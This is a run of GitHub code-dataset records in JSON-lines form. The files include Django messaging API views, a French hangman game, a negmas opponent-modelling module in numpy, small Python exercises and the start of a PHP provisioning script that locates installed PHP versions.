MessageUser.objects.get(username=sender_name)\n\n #replacing the ID's in the message that the user sent - with actual User Object - for Django to bind it with the coressponding ForiegnKey - MessageUser:\n message_dict[\"receiver\"] = receiver_user_object\n message_dict[\"sender\"] = sender_user_object\n\n # converts the message dictionary (that it makes by de-serialize the JSON data the user sent) to a Message Object(for saving it in the DB)\n message = Message(**message_dict) \n message.save()\n \n # Saves the message in the DB for the receiver:\n receiver_user_object.messages.add(message)\n\n # Saves duplicate of the message in the DB for the sender:\n dup_message = Message(**message_dict) # the ** mark tells the Model to parse the dict as args\n dup_message.is_read = True # The sender obviously saw the message..\n dup_message.save()\n sender_user_object.messages.add(dup_message)\n \n return Response(message_serializer.data, status=status.HTTP_201_CREATED)\n else: \n return Response(message_serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\n@api_view([\"GET\"])\n@permission_classes([IsAuthenticated])\ndef get_unread_messages(request, *args, **kwargs):\n '''\n Returns all Unread Messages of the logged-in User.\n\n Parameters:\n request (HTTP Request) : contains various HTTP content \n *args (possible non-keyword arguments)\n *kwargs (possible keyword arguments) : contains the username in the endpoint (for example: /user1/messages) user1 is the username)\n\n Returns:\n Json Response (Json): if valid - returns the unread messages, if not - returns Http-Error Response\n '''\n\n username = kwargs[\"username\"]\n\n if request.user.username != username:\n return Response(status=status.HTTP_401_UNAUTHORIZED)\n try:\n 
user_object = MessageUser.objects.get(username=username)\n unread_messages = MessageSerializer(user_object.messages.filter(is_read=False), many=True) # Filter the messages by the `is_read` boolean field to get only the unread messages\n \n return Response(unread_messages.data)\n\n except Exception as e:\n return Response(e)\n\n\n@api_view([\"POST\"])\n@permission_classes([AllowAny])\ndef create_user(request, *args, **kwargs):\n \"\"\"\n Create a User to perform API requests with it!\n\n The JSON format:\n\n {\n \"username\": \"your username here\",\n \"password\": \"yourpasswordhere\"\n }\n\n \"\"\" \n\n user_dict = request.data\n\n try:\n\n MessageUser.objects.create_user(**user_dict)\n return Response(status=status.HTTP_201_CREATED)\n\n except IntegrityError:\n return Response(data={\"User Name is Already Taken\"},status=status.HTTP_409_CONFLICT)\n\n except Exception as e:\n return Response(e)\n ","repo_name":"dviralfi/RestAPI-Messages","sub_path":"mainapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"21361467029","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Nov 3 10:49:03 2019\r\n\r\n@author: natas\r\n\"\"\"\r\n\r\nmotmystere= \"\"\r\nmorpartiel= \"\"\r\nlettre= \"\"\r\nnbcoup = 7\r\nlistemots = list()\r\ngo = True\r\n\r\nfichier = open(\"listemots.txt\", \"r\")\r\nlistemots = fichier.readlines()\r\nfichier.close()\r\n\r\nfrom random import choice\r\n\r\ndef choixmot(listemots):\r\n return choice(listemots).rstrip()\r\n\r\ndef initpartiel(motmystere):\r\n motdebut = \"_\"* len(motmystere)\r\n return motdebut\r\n\r\ndef affichemot(motpartiel):\r\n motaffiche = str()\r\n for i in range(len(motpartiel)):\r\n motaffiche = motaffiche + \" \" + motpartiel[i]\r\n print(motaffiche)\r\n \r\ndef initpendu():\r\n global listemots, motmystere, motpartiel, nbcoup\r\n nbcoup = 7\r\n motmystere = choixmot(listemots)\r\n motpartiel = initpartiel(motmystere)\r\n \r\ndef saisiecaract():\r\n lettre = input(\"taper une lettre de votre choix : \")\r\n if lettre == \"?\":\r\n return lettre\r\n while len(lettre) != 1 or (not(65 <= ord(lettre) <= 89 or 97 <= ord(lettre) <= 122)):\r\n lettre = input(\"taper une lettre de votre choix:\")\r\n lettre = lettre.upper()\r\n return lettre\r\n\r\ndef placelettre(lettre,motpartiel):\r\n for i in range(len(motmystere)):\r\n if lettre == motmystere[i]:\r\n motpartiel = motpartiel[:i] + lettre + motpartiel[i+1:]\r\n return motpartiel\r\n \r\ndef finjeu(motmystere,motpartiel,nbcoup,lettre):\r\n if motpartiel == motmystere :\r\n print (\"brv, t'as trouver un mot dans ta vie et c'est:\", motmystere)\r\n return False\r\n if lettre == \"?\":\r\n print(\"fin lol tu veux plus zouer, le mot était:\", motmystere)\r\n return False\r\n if nbcoup == 0:\r\n print(\"perdu rip, le mot était\", motmystere)\r\n return False\r\n return True\r\n \r\ninitpendu()\r\nwhile go :\r\n affichemot(motpartiel)\r\n lettre = saisiecaract()\r\n nbcoup -= 1\r\n print(\"essais restants :\", nbcoup)\r\n motpartiel = placelettre(lettre,motpartiel)\r\n go = finjeu(motmystere, motpartiel, nbcoup, lettre)\r\n\r\n\r\n ","repo_name":"kwintasha/jeu-du-pendu","sub_path":"le jeu du pendu/le jeu du pendu.py","file_name":"le jeu du pendu.py","file_ext":"py","file_size_in_byte":2022,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"25752859841","text":"import os\n\n\ncastxml_bin = \"castxml\"\ncastxml_args 
= \"--castxml-output=1 -w -x c++ -std=c++14 -D__PBPP__\"\npremake_bin = \"premake5\"\n\nif os.name == \"nt\":\n castxml_args += \" -fms-compatibility-version=19\"\n pyroot = r\"C:\\Python27\"\n make = \"mingw32-make\"\nelse: # posix\n pyroot = \"\"\n make = \"make\"\n","repo_name":"vanxining/pbpp","sub_path":"Tests/full_process/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"81"} +{"seq_id":"39531588594","text":"from django.db import models\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.contrib.contenttypes.fields import GenericForeignKey\nfrom django.contrib.auth import get_user_model\nfrom django.utils.translation import gettext_lazy as _\n\n\nclass Like(models.Model):\n content_type = models.ForeignKey(to=ContentType,\n on_delete=models.CASCADE)\n object_id = models.PositiveIntegerField()\n content_object = GenericForeignKey()\n user = models.ForeignKey(to=get_user_model(),\n null=False,blank=False,\n on_delete=models.CASCADE,\n related_name='likes',\n verbose_name=_(\"user\"))\n created = models.DateTimeField(auto_now_add=True,\n null=False,blank=False,\n verbose_name=_(\"created date\"))\n\n class Meta:\n verbose_name = _(\"Like\")\n verbose_name_plural = _(\"Likes\")\n unique_together = ('content_type','object_id','user')\n","repo_name":"MehdioKhan/proman-back","sub_path":"project/likes/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"1100949153","text":"\n\nimport numpy as np\nimport itertools\nfrom functools import wraps\nimport negmas\n\nNUMPY_TYPE = 'float64'\n\ndef likelihood_none_zero(likelihood_cal):\n @wraps(likelihood_cal)\n def wraplikelihood(*args, **kw):\n likelihood = likelihood_cal(*args, **kw)\n if likelihood.max() == 0:\n likelihood[:] = 1\n print('we are in the wrap')\n likelihood = (likelihood.shape[0] * likelihood) / likelihood.sum()\n return likelihood.astype(NUMPY_TYPE)\n return wraplikelihood\n\nclass weight_space:\n\n def __init__(self, ufun, num_hypothesis = 11) -> None:\n\n self.num_issues = len(ufun.weights)\n\n self.num_hypothesis = num_hypothesis\n self.h_space = None\n self.h_probs = None\n self.expectation = None\n self.temp_h_probs = None\n\n self.issue_values_range = {}\n self.issue_num_values = {}\n _i = 0\n _ii = 0\n for k in range(len(ufun.issues)):\n self.issue_values_range[k] = [_ii]\n _i = len(ufun.issues[k].values)\n self.issue_num_values[k] = _i\n _ii = _ii + _i\n self.issue_values_range[k].append(_ii)\n self.num_values = _ii\n\n self.initial_expectation_mode()\n\n self.initial_sapce()\n self.accume = self.get_expectation()\n\n def initial_sapce(self):\n Hs, Ps = self.Grid_First_decopuled_WHS()\n self.h_space = Hs\n self.h_probs = Ps.copy()\n self.initial_h_probs = Ps.copy()\n\n def flatten_weights_HS(self, W_Hspace):\n len_E_HS = self.num_values\n weights_flatten = np.ones([W_Hspace.shape[0], len_E_HS], dtype = NUMPY_TYPE)\n for i in range(self.num_issues):\n range_se = self.issue_values_range[i]\n range_s = range_se[0]\n range_e = range_se[1]\n repeat_times = self.issue_num_values[i]\n weights_flatten[:, range_s:range_e] = np.repeat(W_Hspace[:,i].reshape([-1,1]), repeat_times, axis = 1)\n return weights_flatten\n\n def initial_expectation_mode(self):\n self.get_expectation = self._get_expectation_1\n \n def _get_expectation_1(self):\n accume_w = (self.h_space * 
self.h_probs).sum(axis = 1) / self.h_probs.sum(axis = 1)\n sum_w = accume_w.sum()\n accume_w = accume_w / sum_w\n return accume_w\n \n def update_accume(self):\n self.accume = self.get_expectation()\n\n def expectation_except_issue_i(self, issue_i):\n wh_issue_i = self.h_space[issue_i, :]\n # prob_issue_i = self.h_probs[issue_i, :]\n expectation = np.copy(self.accume)\n expectation = expectation.reshape([1,-1]).repeat(repeats = wh_issue_i.shape[0], axis = 0)\n expectation[:, issue_i] = wh_issue_i\n return expectation\n \n def Grid_First_decopuled_WHS(self):\n weights_HS = np.linspace(0, 1, self.num_hypothesis).reshape([1,-1]).repeat(axis = 0, repeats = self.num_issues)\n WH_probs = np.ones_like(weights_HS)\n return weights_HS, WH_probs\n\nclass evaluation_space:\n\n def __init__(self, ufun, num_hypothesis = 11) -> None:\n self.h_space = None\n self.h_probs = None\n self.expectation = None\n self.num_values = None\n self.issue_num_values = {}\n self.issue_values_range = {}\n self.num_issues = len(ufun.issues)\n\n\n _i = 0\n _ii = 0\n for k in range(len(ufun.issues)):\n self.issue_values_range[k] = [_ii]\n _i = len(ufun.issues[k].values)\n self.issue_num_values[k] = _i\n _ii = _ii + _i\n self.issue_values_range[k].append(_ii)\n self.num_values = _ii\n \n self.num_hypothesis = num_hypothesis\n\n self.initial_expectation_mode()\n\n self.initial_sapce()\n self.accume = self.get_expectation()\n\n def initial_sapce(self):\n\n Hs, Ps = self.Second_decopuled_EHS_mean()\n \n self.h_space = Hs\n self.h_probs = Ps.copy()\n self.initial_h_probs = Ps.copy()\n \n def Second_decopuled_EHS_mean(self):\n num_values = self.num_values\n Hs = np.linspace(0, 1, self.num_hypothesis).reshape([1,-1]).repeat(axis=0, repeats = num_values).astype(NUMPY_TYPE)\n Ps = np.ones_like(Hs)\n return Hs, Ps\n \n def initial_expectation_mode(self):\n\n self.get_expectation = self._get_expectation_2b\n \n def _get_expectation_2b(self):\n accume_e = (self.h_space * self.h_probs).sum(axis = 1) / self.h_probs.sum(axis = 1)\n return accume_e\n\n def update_accume(self):\n self.accume = self.get_expectation()\n\n def expectation_except_issue_i(self, issue_i):\n h_issue_i = self.h_space[issue_i]\n # prob_issue_i = self.h_probs[issue_i]\n expectation = np.copy(self.accume)\n expectation = expectation.reshape([1,-1]).repeat(repeats=h_issue_i.shape[0], axis = 0)\n value_range = self.issue_values_range[issue_i]\n expectation[:, value_range[0]:value_range[1]] = h_issue_i\n return expectation\n\n def expectation_except_issue_i_value_j_rank(self, issue_i, value_j):\n h_issue_i_value_j = self.h_space[issue_i][value_j, :]\n # prob_issue_i_value_j = self.h_probs[issue_i][value_j, :]\n expectation = np.copy(self.accume)\n expectation = expectation.reshape([1,-1]).repeat(repeats=h_issue_i_value_j.shape[0], axis = 0)\n value_range = self.issue_values_range[issue_i]\n value_start = value_range[0]\n value_update = value_start + value_j\n expectation[:, value_update] = h_issue_i_value_j\n return expectation\n \n def expectation_except_issue_i_value_j_mean(self, faltten_value_j):\n h_issue_i_value_j = self.h_space[faltten_value_j, :]\n # prob_issue_i_value_j = self.h_probs[faltten_value_j, :]\n expectation = np.copy(self.accume)\n expectation = expectation.reshape([1,-1]).repeat(repeats=h_issue_i_value_j.shape[0], axis = 0)\n expectation[:, faltten_value_j] = h_issue_i_value_j\n return expectation\n\nclass Meta_OM:\n\n def __init__(self, ufun, \n compact_version = 'None',\n compact_gate = 500,\n time_max = 5000,\n SIGMA = 0.15):\n \n 
self._init_base(ufun, time_max, SIGMA, compact_version, compact_gate)\n\n self.weights = weight_space(ufun = ufun)\n self.evaluations = evaluation_space(ufun = ufun)\n \n self.update_weights = self.update_weights_v1\n\n self.update_evaluations = self.update_evaluations_v2b\n \n # self.update_accumed_ufun()\n \n def _init_base(self, ufun, time_max, SIGMA, compact_version, compact_gate):\n self.bids_history = []\n self.onehot_bids_history = None\n self.onehot_bids_history_origin = None\n self.time_sequence = np.array([], dtype = NUMPY_TYPE)\n self.time_sequence_origin = np.array([], dtype = NUMPY_TYPE)\n self.SIGMA = SIGMA\n\n self.num_outcomes = negmas.outcomes.num_outcomes(ufun.outcome_space.issues)\n\n self.times_i = 0\n # self.time_correct = 0\n self.first_update = 1\n self.time_max = time_max\n\n self.issues = []\n self.values = {}\n self.issue_num = {}\n self.value_num_issue = {} \n self.issue_value_num_flatten = {}\n self.issueID_valueID_flatten = {}\n self.num_issues = len(ufun.issues)\n _i = 0\n _iii = 0\n self.weights_range = {}\n for k in ufun.issues:\n k_name = k.name\n k_values = k.values\n self.issues.append(k_name)\n self.values[k_name] = k_values\n self.issue_num[k_name] = _i\n self.issue_value_num_flatten[_i] = {}\n self.weights_range[_i] = []\n self.value_num_issue[_i] = {}\n self.issueID_valueID_flatten[_i] = {}\n _ii = 0\n for v in k_values:\n self.value_num_issue[_i][v] = _ii\n self.issueID_valueID_flatten[_i][_ii] = _iii\n _ii = _ii + 1\n self.issue_value_num_flatten[_i][v] = _iii\n self.weights_range[_i].append(_iii)\n _iii = _iii + 1\n _i = _i + 1\n self.num_values = _iii # the lenth of flatten evaluations\n self.update = self._first_update_func\n self.likelihood_func = self._first_likelihood_func\n \n self.compact_gate = compact_gate\n if compact_version == 'Moving':\n self.compact_bids_times = self._compact_bids_times_Moving\n else:\n self.compact_bids_times = self._compact_bids_times_None\n\n def flatten_weights_HS(self, W_Hspace):\n len_E_HS = self.num_values\n weights_flatten = np.ones([W_Hspace.shape[0], len_E_HS], dtype=NUMPY_TYPE)\n for i in range(self.num_issues):\n range_repeat = self.weights_range[i]\n repeat_times = len(range_repeat)\n weights_flatten[:, range_repeat] = np.repeat(W_Hspace[:,i].reshape([-1,1]), repeat_times, axis = 1)\n return weights_flatten\n\n def update_weights_v1(self, accume_e):\n for i in range(self.weights.num_issues):\n hs_i = self.weights.expectation_except_issue_i(i)\n hs_i_flatten = self.flatten_weights_HS(hs_i)\n ufun_flatten = hs_i_flatten * accume_e\n Ls = self.likelihood_func(ufun_flatten)\n h_probs_i = self.weights.h_probs[i, :] * Ls\n\n prob_sum = h_probs_i.sum()\n if prob_sum != 0:\n self.weights.h_probs[i, :] = (h_probs_i * h_probs_i.size) / prob_sum\n else:\n self.weights.h_probs[i, :] = np.ones_like(h_probs_i)\n\n self.weights.update_accume()\n\n def update_evaluations_v2b(self, accume_w_flatten):\n for j in range(self.num_values):\n hs_j = self.evaluations.expectation_except_issue_i_value_j_mean(j)\n ufun_j = hs_j * accume_w_flatten\n Ls = self.likelihood_func(ufun_j)\n h_probs_j = self.evaluations.h_probs[j,:] * Ls\n\n sum_prob = h_probs_j.sum()\n if sum_prob != 0:\n self.evaluations.h_probs[j,:] = (h_probs_j * h_probs_j.size) / sum_prob\n else:\n self.evaluations.h_probs[j,:] = np.ones_like(h_probs_j)\n\n self.evaluations.update_accume()\n\n def _update_base(self, offer):\n offer_onehot = self.offer_2_onehot(offer)\n self.onehot_bids_history_origin = np.append(self.onehot_bids_history_origin, 
offer_onehot.reshape([1,-1]), axis = 0)\n self.bids_history.append(offer)\n self.update_time_sequence()\n self.compact_bids_times()\n\n def _compact_bids_times_Moving(self):\n if self.onehot_bids_history_origin.shape[0] <= self.compact_gate:\n self.onehot_bids_history = self.onehot_bids_history_origin\n self.time_sequence = self.time_sequence_origin\n else:\n self.onehot_bids_history = self.onehot_bids_history_origin[-self.compact_gate:, :]\n self.time_sequence = self.time_sequence_origin[-self.compact_gate:]\n \n def _compact_bids_times_None(self):\n self.onehot_bids_history = self.onehot_bids_history_origin\n self.time_sequence = self.time_sequence_origin\n\n def _update_base_first(self, offer):\n offer_onehot = self.offer_2_onehot(offer)\n self.onehot_bids_history_origin = offer_onehot.reshape([1,-1])\n self.onehot_bids_history = self.onehot_bids_history_origin\n\n self.not_proposed = np.ones(self.num_values) * self.num_outcomes / 2\n self.not_proposed = self.not_proposed - offer_onehot\n self.num_unproposed = self.num_outcomes - 1\n\n self.bids_history.append(offer)\n self.first_update_time_sequence()\n self.time_sequence = self.time_sequence_origin\n\n def update_Sequence(self, offer, t):\n self._update_base(offer)\n\n accume_e = self.evaluations.accume.reshape([1,-1])\n self.update_weights(accume_e = accume_e)\n self.weights.update_accume()\n\n accume_w_flatten = self.flatten_weights_HS(self.weights.accume.reshape([1,-1]))\n self.update_evaluations(accume_w_flatten = accume_w_flatten)\n self.evaluations.update_accume()\n\n self.update_accumed_ufun()\n\n def _first_update_func(self, offer, t):\n self._update_base_first(offer)\n\n accume_e = self.evaluations.accume.reshape([1,-1])\n self.update_weights(accume_e = accume_e)\n accume_w_flatten = self.flatten_weights_HS(self.weights.accume.reshape([1,-1]))\n self.update_evaluations(accume_w_flatten = accume_w_flatten)\n self.update_accumed_ufun()\n\n self.evaluations.initial_h_probs = self.evaluations.h_probs\n self.weights.initial_h_probs = self.weights.h_probs\n self.first_update = 0\n\n self.update = self.update_Sequence\n self.likelihood_func = self._likelihood_func\n\n def offer_2_onehot(self, offer):\n offer_onehot = np.zeros(self.num_values, dtype='int')\n for i in range(len(offer)):\n value = offer[i]\n loc_value = self.issue_value_num_flatten[i][value]\n offer_onehot[loc_value] = 1\n return offer_onehot\n \n def __call__(self, offer):\n offer_onehot = self.offer_2_onehot(offer)\n util = (self.accume_ufun * offer_onehot).sum(axis = 0)\n return util\n\n def update_time_sequence(self):\n t_i = self.times_i / self.time_max\n self.time_sequence_origin = np.append(self.time_sequence_origin, t_i)\n self.times_i = self.times_i + 1\n\n def first_update_time_sequence(self):\n t_i = self.times_i / self.time_max\n self.time_sequence_origin = np.array([t_i])\n self.times_i = self.times_i + 1\n \n def update_accumed_ufun(self):\n evaluations = self.evaluations.accume\n flatten_weights = self.flatten_weights_HS(self.weights.accume.reshape([1,-1])).reshape([-1])\n self.accume_ufun = flatten_weights * evaluations\n \n @likelihood_none_zero\n def _first_likelihood_func(self, ufuns):\n sigma = self.SIGMA\n first_bid = self.onehot_bids_history[0, :]\n estimated_utilities = (ufuns * first_bid).sum(axis = 1)\n delta = estimated_utilities - 1\n delta[np.where(delta >= 0)] = 0\n likelihood = (1 / (sigma * np.sqrt(2 * np.pi))) * np.exp(-(delta * delta) / (2 * sigma * sigma))\n return likelihood\n\n\n\nclass Specific_OM(Meta_OM):\n\n 
@likelihood_none_zero\n def _likelihood_func(self, ufuns):\n bids_till_now = self.onehot_bids_history\n time = self.time_sequence_origin[-1]\n u_T = 1 - 0.1 * time\n newest_bid = bids_till_now[-1, :]\n u_H = (ufuns * newest_bid).sum(axis = 1)\n sigma = self.SIGMA\n delta = u_H - u_T\n likelihood = 1 / (self.SIGMA * np.sqrt(2*np.pi)) * np.exp(-(delta ** 2) / (2 * sigma * sigma))\n\n return likelihood\n \n","repo_name":"Shengbo-Chang/supplementary-for-COMB","sub_path":"model_codes/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":14950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"32123557247","text":"a,b=map(int,input().split())\nt=input()\narr=[]\n\nfor i in t:\n num=(ord(i)-ord('a'))\n arr.append(num)\nanswer=[]\nalpha=['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z']\n\nfor i in arr:\n cnt=1\n\n while ((26*cnt+i-b)%a) !=0:\n cnt+=1\n ans= ((26 * cnt + i - b) // a)% 26\n answer.append(ans)\n\nfor i in answer:\n print(alpha[i],end='')\n","repo_name":"imdduoming/hitalgor","sub_path":"Codingtest/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"74506897544","text":"# x = [ [5,2,3], [10,8,9] ] \n# x[1][0]=15\n# print(x)\n\n# students = [\n# {'first_name': 'Michael', 'last_name' : 'Jordan'},\n# {'first_name' : 'John', 'last_name' : 'Rosales'}\n# ]\n# students[0]['last_name']='Bryant'\n# print(students)\n\n# sports_directory = {\n# 'basketball' : ['Kobe', 'Jordan', 'James', 'Curry'],\n# 'soccer' : ['Messi', 'Ronaldo', 'Rooney']\n# }\n\n\n# sports_directory['soccer'][0]='Andres'\n# print(sports_directory)\n\n\n# students = [\n# {'first_name': 'Michael', 'last_name' : 'Jordan'},\n# {'first_name' : 'John', 'last_name' : 'Rosales'},\n# {'first_name' : 'Mark', 'last_name' : 'Guillen'},\n# {'first_name' : 'KB', 'last_name' : 'Tonel'}\n# ]\n# def iterateDictionary(students):\n \n# for i in students:\n \n# print(i)\n\n\n##iterateDictionary(students)\n\n# def iterateDictionary2(key_name, dic):\n# for i in dic:\n \n# print(i[key_name])\n\n\n\n# iterateDictionary2('first_name', students)\n# iterateDictionary2('last_name', students)\n\ndojo = {\n 'locations': ['San Jose', 'Seattle', 'Dallas', 'Chicago', 'Tulsa', 'DC', 'Burbank'],\n 'instructors': ['Michael', 'Amy', 'Eduardo', 'Josh', 'Graham', 'Patrick', 'Minh', 'Devon']\n}\n\ndef printInfo(dict):\n for key in dict:\n print(len(dict[key]),key.upper())\n for val in dict[key]:\n print(val)\n\n\nprintInfo(dojo)\n\n","repo_name":"AlaaMansourn/python_stack","sub_path":"_python/python_fundementals/intermediate_function2.py","file_name":"intermediate_function2.py","file_ext":"py","file_size_in_byte":1371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"1155416444","text":"import sys\r\nimport subprocess\r\nimport os\r\nimport shutil\r\nimport re\r\nimport logging\r\nimport autoprov.ProcessUtil as ProcessUtil\r\nimport autoprov.autoprov as autoprov\r\nimport json\r\n\r\ndocRoot = webServer = phpVersion = phpConfigFolder = \"\"\r\n\r\nPHP_IAE_DIR = \"iae-php\"\r\nVSP_INI_FILE = \"vsp.ini\"\r\nVSP_OPT_FOLDER = \"/opt/virsec\"\r\n\r\nclass Php:\r\n def __init__(self, *args): # pkgName, configDir, phpVersion):\r\n if (len(args) == 3):\r\n self.__pkgName = args[0]\r\n self.__configDir = args[1]\r\n self.__version = args[2]\r\n self.__zts = 
False\r\n\r\n if (len(args) == 1):\r\n self.__phpPath = args[0]\r\n self.__phpInfo = None\r\n self.InitPhpInfo()\r\n self.InitMetadata()\r\n\r\n def InitMetadata(self):\r\n self.__version = self.FindValue(\"^PHP Version => (.+)$\")\r\n self.__configDir = self.FindValue('^Scan this dir for additional .ini files => (.+)$')\r\n self.__zts = self.FindValue('^Thread Safety => (.+)$') == \"enabled\"\r\n\r\n\r\n def InitPhpInfo(self):\r\n cmd = [self.__phpPath, \"-d\", \"virseciae.disable=1\", \"-i\"] \r\n try:\r\n self.__phpInfo = ProcessUtil.execute(cmd, stderr=open(os.devnull, 'w+')).decode('latin-1')\r\n except subprocess.CalledProcessError as e:\r\n logging.debug(\"Error executing %s : %s\" % (\" \".join(cmd), e))\r\n\r\n def FindValue(self, regx, group=1):\r\n if not self.__phpInfo:\r\n return \"\"\r\n\r\n info = self.__phpInfo\r\n if info:\r\n matches = re.search(regx, info, flags=re.M)\r\n if matches:\r\n res = matches.group(group)\r\n if res != '(none)':\r\n return res\r\n\r\n return \"\"\r\n\r\n def major(self):\r\n if self.__version:\r\n return int(self.__version.split('.')[0])\r\n\r\n def minor(self):\r\n if self.__version:\r\n return int(self.__version.split('.')[1])\r\n\r\n def patch(self):\r\n if self.__version:\r\n return int(self.__version.split('.')[2])\r\n\r\n def Version(self):\r\n if self.__version:\r\n return \"%d.%d\" % (self.major(), self.minor())\r\n else:\r\n return \"\"\r\n\r\n def ConfigFolder(self):\r\n return self.__configDir\r\n\r\n def IsZts(self):\r\n return self.__zts\r\n\r\nclass PhpDebianPackages:\r\n DebianPackageCmd = '/usr/bin/dpkg'\r\n DebianPackageQuery = '/usr/bin/dpkg-query'\r\n Packages = {\r\n 'libapache2-mod-php5.6': {\r\n '_extension_dir': '/usr/lib/php/20131226',\r\n '_configuration_dir': '/etc/php/5.6/apache2/conf.d'\r\n },\r\n 'libapache2-mod-php5': {\r\n '_extension_dir': '/usr/lib/php5/20131226',\r\n '_configuration_dir': '/etc/php5/apache2/conf.d'\r\n },\r\n 'libapache2-mod-php7.0': {\r\n '_extension_dir': '/usr/lib/php/20151012',\r\n '_configuration_dir': '/etc/php/7.0/apache2/conf.d'\r\n },\r\n 'libapache2-mod-php7.1': {\r\n '_extension_dir': '/usr/lib/php/20160303',\r\n '_configuration_dir': '/etc/php/7.1/apache2/conf.d'\r\n },\r\n 'libapache2-mod-php7.2': {\r\n '_extension_dir': '/usr/lib/php/20170718',\r\n '_configuration_dir': '/etc/php/7.2/apache2/conf.d'\r\n },\r\n 'libapache2-mod-php7.3': {\r\n '_extension_dir': '/usr/lib/php/20180731',\r\n '_configuration_dir': '/etc/php/7.3/apache2/conf.d'\r\n },\r\n 'libapache2-mod-php7.4': {\r\n '_extension_dir': '/usr/lib/php/20190902',\r\n '_configuration_dir': '/etc/php/7.4/apache2/conf.d'\r\n },\r\n 'libapache2-mod-php8.0': {\r\n '_extension_dir': '/usr/lib/php/20200930',\r\n '_configuration_dir': '/etc/php/8.0/apache2/conf.d'\r\n },\r\n 'php5-cgi': {\r\n '_extension_dir': '/usr/lib/php5/20131226',\r\n '_configuration_dir': '/etc/php5/cgi/conf.d'\r\n },\r\n 'php7.0-cgi': {\r\n '_extension_dir': '/usr/lib/php/20151012',\r\n '_configuration_dir': '/etc/php/7.0/cgi/conf.d'\r\n },\r\n 'php7.1-cgi': {\r\n '_extension_dir': '/usr/lib/php/20160303',\r\n '_configuration_dir': '/etc/php/7.1/cgi/conf.d'\r\n },\r\n 'php7.2-cgi': {\r\n '_extension_dir': '/usr/lib/php/20170718',\r\n '_configuration_dir': '/etc/php/7.2/cgi/conf.d'\r\n },\r\n 'php7.3-cgi': {\r\n '_extension_dir': '/usr/lib/php/20180731',\r\n '_configuration_dir': '/etc/php/7.3/cgi/conf.d'\r\n },\r\n 'php7.4-cgi': {\r\n '_extension_dir': '/usr/lib/php/20190902',\r\n '_configuration_dir': '/etc/php/7.4/cgi/conf.d'\r\n },\r\n 'php8.0-cgi': {\r\n 
'_extension_dir': '/usr/lib/php/20200930',\r\n '_configuration_dir': '/etc/php/8.0/cgi/conf.d'\r\n },\r\n }\r\n\r\n def InstalledPackages(self):\r\n instldPackages = []\r\n\r\n if not os.path.exists(self.DebianPackageQuery):\r\n return instldPackages\r\n\r\n cmd = [self.DebianPackageQuery, '-W', '-f', '${binary:Package} ${Version}\\n']\r\n try:\r\n outputs = ProcessUtil.execute(cmd, stderr=open(os.devnull, 'w+')).decode('latin-1').split(\"\\n\")\r\n\r\n #logging.debug(\"CMD - %s, Output: %s\" % (cmd, outputs))\r\n\r\n outputs.pop()\r\n for line in outputs:\r\n items = line.split(\" \")\r\n instldPackages.append([items[0], items[1].split('-')[0]])\r\n\r\n except subprocess.CalledProcessError as e:\r\n logging.debug(\"Command invocation error %s : %s\" % (\" \".join(cmd), e))\r\n\r\n return instldPackages\r\n\r\n def InstalledPhpPackages(self, reqVer):\r\n phpPckgs = []\r\n pckgs = self.InstalledPackages()\r\n for pckg in pckgs:\r\n if pckg[0] in self.Packages:\r\n fndPckg = self.Packages[pckg[0]]\r\n phpPckg = Php(pckg[0], fndPckg[\"_configuration_dir\"], pckg[1]) \r\n if phpPckg.Version() == reqVer:\r\n phpPckgs.append(phpPckg)\r\n \r\n return phpPckgs\r\n\r\nclass PhpKnownLocation:\r\n KnownFolders = [\r\n '/usr/php/bin',\r\n '/usr/php-7.0/bin',\r\n '/usr/php-7.1/bin',\r\n '/usr/php-7.2/bin',\r\n '/usr/php-7.3/bin',\r\n '/usr/php-7.4/bin',\r\n '/usr/php-8.0/bin',\r\n '/usr/php/7.0/bin',\r\n '/usr/php/7.1/bin',\r\n '/usr/php/7.2/bin',\r\n '/usr/php/7.3/bin',\r\n '/usr/php/7.4/bin',\r\n '/usr/php/8.0/bin',\r\n\r\n '/usr/local/bin',\r\n '/usr/local/php/bin',\r\n '/usr/local/zend/bin',\r\n '/usr/local/php-7.0/bin',\r\n '/usr/local/php-7.1/bin',\r\n '/usr/local/php-7.2/bin',\r\n '/usr/local/php-7.3/bin',\r\n '/usr/local/php-7.4/bin',\r\n '/usr/local/php-8.0/bin',\r\n\r\n '/opt/local/bin',\r\n '/opt/php/bin',\r\n '/opt/zend/bin',\r\n '/opt/php-7.0/bin',\r\n '/opt/php-7.1/bin',\r\n '/opt/php-7.2/bin',\r\n '/opt/php-7.3/bin',\r\n '/opt/php-7.4/bin',\r\n '/opt/php-8.0/bin',\r\n\r\n '/opt/cpanel/ea-php53/root/usr/bin',\r\n '/opt/cpanel/ea-php54/root/usr/bin',\r\n '/opt/cpanel/ea-php55/root/usr/bin',\r\n '/opt/cpanel/ea-php56/root/usr/bin',\r\n '/opt/cpanel/ea-php70/root/usr/bin',\r\n '/opt/cpanel/ea-php71/root/usr/bin',\r\n '/opt/cpanel/ea-php72/root/usr/bin',\r\n '/opt/cpanel/ea-php73/root/usr/bin',\r\n '/opt/cpanel/ea-php74/root/usr/bin',\r\n '/opt/cpanel/ea-php80/root/usr/bin',\r\n\r\n '/opt/cpanel/php/root/usr/bin',\r\n '/opt/cpanel/php/usr/bin',\r\n '/opt/cpanel/php/bin',\r\n\r\n '/RunCloud/Packages/php56rc/bin',\r\n '/RunCloud/Packages/php70rc/bin',\r\n 